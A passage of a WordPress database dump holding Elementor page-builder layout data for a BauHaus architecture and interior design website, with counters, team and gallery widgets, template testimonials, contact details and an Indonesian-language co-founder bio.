applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or WhatsApp: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3943,4881,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3944,4881,'_elementor_pro_version','3.8.1'),(3945,4882,'_wp_page_template','elementor_header_footer'),(3946,4882,'_elementor_edit_mode','builder'),(3947,4882,'_elementor_template_type','wp-page'),(3948,4882,'_elementor_version','3.8.1'),(3949,4882,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Let\'s turn your ideas\\ninto reality\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or WhatsApp: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 